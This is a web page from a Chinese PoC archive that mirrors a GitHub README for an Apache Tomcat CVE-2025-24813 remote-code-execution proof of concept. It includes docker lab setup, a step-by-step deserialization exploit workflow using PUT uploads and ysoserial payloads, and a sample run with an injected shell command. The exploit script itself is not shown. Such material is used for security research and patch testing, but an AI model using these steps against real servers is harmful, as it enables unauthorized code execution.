目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2025-24813 PoC — Apache Tomcat 环境问题漏洞

来源
https://github.com/hakankarabacak/CVE-2025-24813
关联漏洞
标题:Apache Tomcat 环境问题漏洞 (CVE-2025-24813)
Description:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 11.0.0-M1至11.0.2版本、10.1.0-M1至10.1.34版本和9.0.0.M1至9.0.98版本存在环境问题漏洞。攻击者利用该漏洞可以远程执行代码或泄露敏感信息。
Description
Proof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.
介绍
# CVE-2025-24813
Proof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.

The script has been modified based on the [related link](https://github.com/absholi7ly/POC-CVE-2025-24813) and tailored to my needs.

## Setup Vulnerable Tomcat Environment
Given environment based on the official Tomcat 9.0.90 image. It removes the server's read-only restriction and configures it to save session data to disk. Then, it automatically deploys application by copying ROOT.war file into Tomcat’s webapps/ directory.
   ```
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813
   ```

## Workflow
1. A `check.txt` file with the Content-Range header is placed to verify if the server is accepting PUT requests.
2. If the server is writable, a payload for the desired command is generated using `ysoserial`.
3. The malicious session file is uploaded to the directory via a PUT request, linking it to the Session ID and FileName.
4. A GET request is sent with a custom `JSESSIONID`, triggering deserialization.
5. The temporary payload file deleted from the directory.

## Usage
   ```
$ python3 cve_2025_24813.py

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
    
                    --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
   ```

## PoC
https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →